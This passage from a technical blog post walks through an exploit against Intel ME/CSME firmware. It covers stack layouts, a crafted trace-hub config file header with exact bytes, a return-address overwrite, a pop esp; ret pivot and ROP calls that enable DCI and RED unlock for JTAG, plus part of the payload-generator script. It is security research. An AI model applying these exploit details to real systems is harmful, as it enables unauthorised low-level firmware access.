        0x55FCC: saved ebp of bup_main
        0x55FC8: saved edi
        0x55FC4: saved esi
        0x55FC0: saved ebx
        0x55FBC: var_10
        0x55FB8: retaddr - call bup_init_trace_hub
          0x55FB4: saved ebp of bup_run_init_scripts
          0x55FB0: saved esi
          0x55FAC: saved ebx
          0x55C64: STACK esp-0x348
            0x55FA8: security cookie
            0x55C80: ct_data
            0x55C6C: si_features
            0x55C68: file_size
            0x55C64: bytes_read
            0x55C60: 0xBF - arg to bup_init_trace_hub_set_systracer
            0x55C5C: 7 - arg
            0x55C58: retaddr - call bup_init_trace_hub_set_systracer
              0x55C54: saved ebp of bup_init_trace_hub
So you can see that the systracer value that gets modified is at 0x55C58, which according to the stack is the return address of bup_init_trace_hub_set_systracer. If we look at the dump of the stack from before, you can also see that the value at 0x55C68 is indeed 7 as expected (due to *(uint32_t *) (systracer + 0x10) = seg1;). If we can control the return address of our own function, then we control what we execute.
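The address arithmetic behind that paragraph can be checked in a couple of lines. This is a sketch that assumes the target slot is 0x55C58, i.e. the retaddr slot sitting just below the `7` argument at 0x55C5C in the stack layout; the variable names are mine, not PT's.

```python
SYS_TRACER_CTX_OFFSET = 0x200  # systracer context offset inside the syslib context
TARGET = 0x55C58               # assumed: retaddr slot of bup_init_trace_hub_set_systracer

# The fake syslib context must sit 0x200 below the slot we want treated as "systracer".
fake_syslib_ctx = TARGET - SYS_TRACER_CTX_OFFSET
# The function also writes seg1 (7) at systracer + 0x10.
seg1_slot = TARGET + 0x10

print(hex(fake_syslib_ctx), hex(seg1_slot))  # 0x55a58 0x55c68
```

The first value matches the dword `58 5A 05 00` stored at 0x55FF0 in the last row of the dump, and the second is where the 7 shows up.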
The only parts of the return address that can be controlled, though, are bits 0, 1, 6, 7, 8 and 9. Bits 0 and 1 are always set to 1, bits 6, 7 and 8 depend on a value stored in segment 0xBF at offset 0x10, and bit 9 depends on a value stored in segment 0xBF at offset 0xE0. Thankfully, both those values in segment 0xBF can be set through the tracehub configuration file header (the loop at the end of bup_init_trace_hub).
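To make the bit constraint concrete, here is a minimal Python sketch of which addresses a given return address could be turned into. It assumes the untouched bits keep their original value and that bits 6 to 9 can be chosen freely through segment 0xBF; the helper names are made up for illustration and do not come from the firmware or from PT's script.

```python
# Bits of the return address the write can influence, per the description above:
# bits 0 and 1 are forced to 1, bits 6-8 come from 0xBF:10, bit 9 from 0xBF:E0.
FORCED_ONE = 0b11
CHOSEN = (0b111 << 6) | (1 << 9)
CONTROLLED = FORCED_ONE | CHOSEN  # mask of every bit that can change


def reachable_addresses(retaddr):
    """All values retaddr could become, assuming other bits are preserved."""
    base = (retaddr & ~CONTROLLED) | FORCED_ONE
    # Bits 6..9 form a contiguous 4-bit field, so enumerate its 16 settings.
    return sorted(base | (bits << 6) for bits in range(16))


def is_reachable(retaddr, target):
    """True if target differs from retaddr only in the controllable bits."""
    return target in reachable_addresses(retaddr)


if __name__ == "__main__":
    print(hex(CONTROLLED))
    print([hex(a) for a in reachable_addresses(0x49BDB)])
```

Any return address that agrees with 0x49BDB outside those six bits can be redirected there, which is why a gadget location with bits 0 and 1 set had to be found.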
The ct file header has this format:
struct {
    uint8_t ignore[6];
    uint16_t num_entries;
    struct {
        uint24_t offset; // offset in the segment is only 20 bits
        uint8_t segment_selector; // if value is 1, segment is 0x07, if value is 2, segment is 0xBF
        uint32_t value; // value to set at segment_selector:offset
    } entries[num_entries];
};
With the ct file header being set by the exploit to:
00 00 00 00 00 00 02 00 E0 00 00 02 00 00 00 5F
10 00 00 02 88 08 00 00 00 00 00 00 00 00 00 00
We can see it has 2 entries, which set 0xBF:E0 to 0x5F000000 and 0xBF:10 to 0x888.
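As a sanity check on that reading, here is a small Python sketch that decodes a header in the format described above. The function name and the SEGMENTS table are my own, and the header bytes are the 24 bytes implied by the struct layout (6 ignored bytes, a 16-bit count, two 8-byte entries), so treat it as an illustration rather than PT's code.

```python
import struct

# Selector values from the struct comment: 1 -> segment 0x07, 2 -> segment 0xBF.
SEGMENTS = {1: 0x07, 2: 0xBF}


def parse_ct_header(data):
    """Return the (segment, offset, value) writes described by a ct header."""
    (num_entries,) = struct.unpack_from("<H", data, 6)  # after 6 ignored bytes
    entries = []
    for i in range(num_entries):
        pos = 8 + 8 * i
        # 24-bit little-endian field, of which only 20 bits are the offset.
        offset = int.from_bytes(data[pos:pos + 3], "little") & 0xFFFFF
        selector = data[pos + 3]
        (value,) = struct.unpack_from("<I", data, pos + 4)
        entries.append((SEGMENTS[selector], offset, value))
    return entries


header = bytes.fromhex(
    "000000000000" "0200"      # ignore[6], num_entries = 2
    "e0000002" "0000005f"      # entry 1: offset 0xE0, selector 2, value
    "10000002" "88080000"      # entry 2: offset 0x10, selector 2, value
)

if __name__ == "__main__":
    for segment, offset, value in parse_ct_header(header):
        print(f"0x{segment:02X}:{offset:X} = 0x{value:X}")
```

The header is 0x18 bytes long, which is why the data that follows it starts at offset 0x18 in the file.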
With those values set, the bup_init_trace_hub_set_systracer function that gets called in bup_init_trace_hub will overwrite its own return address at 0x55C58, changing it from 0x…B to 0x49BDB. That makes it jump into the middle of sub_…BB6 with the stack / ebp of bup_init_trace_hub, such that when that function returns, it returns to the address stored in the retaddr slot of bup_init_trace_hub, which is at 0x55FB8. Note that sub_…BB6 does not check the stack for the security cookie, and the point where we jump into it makes it call a few functions that just return with an error because their parameters are wrong, so it doesn't seem to do anything.
The address 0x55FB8 that holds that retaddr is at position 0x338 in the ct file (0x56000 - 0x55FB8 = 0x48 bytes from the end of the file, which has size 0x380), and that position contains:
1A 6E 01 00 98 5C 05 00
The address 0x16E1A is in the middle of an actual instruction, but the bytes there will themselves be interpreted as the instruction pop esp followed by a ret. This pops the next value, 0x55C98, into the stack pointer and returns to it. If you remember, I said the ct buffer is saved at 0x55C80 (which you can also see from the stack analysis above), so address 0x55C98 is at offset 0x18 in the CT file (right after the header and those 2 entries that set values in segment 0xBF). That is where we find the actual ROP gadgets, which enable DCI, set red unlock, then enter an infinite loop.
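The address arithmetic in the last few paragraphs can be checked with a few lines of Python. This is only a sketch: CT_BASE and the helper function are names I introduce here, and the constants are the ones quoted in the text (stack top 0x56000, file size 0x380).

```python
import struct

STACK_BASE = 0x56000                  # top of the stack in the listing above
BUFFER_OFFSET = 0x380                 # size of the ct file
CT_BASE = STACK_BASE - BUFFER_OFFSET  # stack address where ct_data starts


def file_offset(stack_addr):
    """Offset inside the ct file of a given stack address."""
    return stack_addr - CT_BASE


# The 8 bytes found at position 0x338 of the ct file, as two little-endian dwords.
small_rop = bytes.fromhex("1a6e0100985c0500")
gadget, new_esp = struct.unpack("<II", small_rop)

if __name__ == "__main__":
    print(f"ct_data starts at 0x{CT_BASE:X}")
    print(f"retaddr of bup_init_trace_hub is at file offset 0x{file_offset(0x55FB8):X}")
    print(f"gadget 0x{gadget:X}, new esp 0x{new_esp:X}")
    print(f"new esp points at file offset 0x{file_offset(new_esp):X}")
```

So the first dword replaces the return address with the pop esp; ret gadget, and the second is the value that gadget pops, which points straight back into the file right after the header.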
If we look back at the python script that generates the CT file for the exploit, we can now understand everything it does:
STACK_BASE = 0x56000
BUFFER_OFFSET = 0x380
SYS_TRACER_CTX_OFFSET = 0x200
SYS_TRACER_CTX_REQ_OFFSET = 0x55c58
RET_ADDR_OFFSET = 0x338

def GenerateTHConfig():
    print("[*] Generating fake tracehub configuration ...")
    trace_hub_config = struct.pack("…

The only remaining magic number is in that data_tail variable, which is the TLS structure. The 0x03000300 value is simply the thread ID.
Rops
The latest version of the exploit, which adds CPU bring-up, simply adds the ROP gadgets needed to continue the bup initialization just as it normally would right after bup_init_trace_hub returns (by resetting the syslib context to the right value, then restoring the stack and registers, then returning into bup_run_init_scripts).
The ROPs are quite simple; they do two things. First they enable the DCI interface, then they set the DfX Aggregator personality to 3 (which enables RED Unlock for JTAG), and finally they enter an infinite loop.
// Enable DCI
side_band_mapping(0x706A8, 0x100);
put_sel_word(0x19F, 0, 0x1010); // Sets 0x19F:0 to 0x1010

// Set DfX-agg personality
side_band_mapping(0x70684, 0x100);
put_sel_word(0x19F, 0x8400, 3); // Sets 0x19F:8400 to 3

loop();
I wondered for a long time “what is that sideband mapping” and “what are those 0x706A8 and 0x70684 values”. I will explain these in the next blog post (in the next couple of days), but in summary, it causes segment 0x19F to be mapped to the DCI and DfX Aggregator devices' Private Configuration Registers (PCRs). So first, you map segment 0x19F to the DCI device's PCR, then you enable DCI by setting the flags to 1, then you map segment 0x19F to the DfX-agg device, then set the personality register in its PCR at offset 0x8400 to 3 (red).
With just those two values set, you have DCI enabled and Red Unlock enabled, and the exploit is working. Congratulations, you can now play around with your CSE device via JTAG.
Conclusion
The CT file has 4 things:
Header: which sets the various values in segment 0xBF for the systracer to work
Big ROPs: which execute the custom code we want to enable DCI and RED unlock
Small ROPs: Smaller header at offset 0x338 which does a pop esp; ret to return us to the first bigger ROP
TLS: The modified TLS header which points the syslib context to 0x55A58 so the systracer offset points to the return address of the function that sets it.

The new TLS has a new syslib context, which points the systracer offset at the return address of the bup_init_trace_hub_set_systracer function. That function then modifies its own return address using the values in the ct file header, so that it jumps to 0x49BDB in sub_…BB6. When that function returns, it jumps to the small ROP, which replaces ESP with the address of the big ROPs and executes them. These enable DCI and JTAG, then either loop forever or continue the bup init process, depending on the version of the exploit used.
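Putting the four pieces side by side, this short Python sketch lists where each one starts in the file. The start addresses are the ones from the stack listing and the text above; the region names and the layout() helper are only for illustration, and the sketch says nothing about where each region ends.

```python
STACK_BASE = 0x56000
CT_SIZE = 0x380
CT_BASE = STACK_BASE - CT_SIZE  # the file is copied so that it ends at STACK_BASE

# (name, stack address where the region starts)
regions = [
    ("header", CT_BASE),
    ("big ROPs", 0x55C98),    # value popped into esp by the small ROP
    ("small ROP", 0x55FB8),   # retaddr slot of bup_init_trace_hub
    ("TLS", 0x55FEC),         # TLS slot at the top of the stack
]


def layout():
    """Return (name, file offset, stack address) rows sorted by file offset."""
    rows = [(name, addr - CT_BASE, addr) for name, addr in regions]
    return sorted(rows, key=lambda row: row[1])


if __name__ == "__main__":
    for name, offset, addr in layout():
        print(f"{name:10s} file offset 0x{offset:03X}  stack 0x{addr:05X}")
```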
Yeah... that was a lot of fun to figure out. So you see that this exploit is not entirely the same as the Skylake exploit. The Skylake exploit is actually quite a lot more difficult to achieve because it involves more moving parts. I assume that’s the reason why PT hadn’t released that.
In the next post I write, I will explain how I ported this exploit to ME 11.x using the information provided by Positive Technologies, and I will explain how to port it to your own ME version using what I wrote as a base.
Thanks for reading!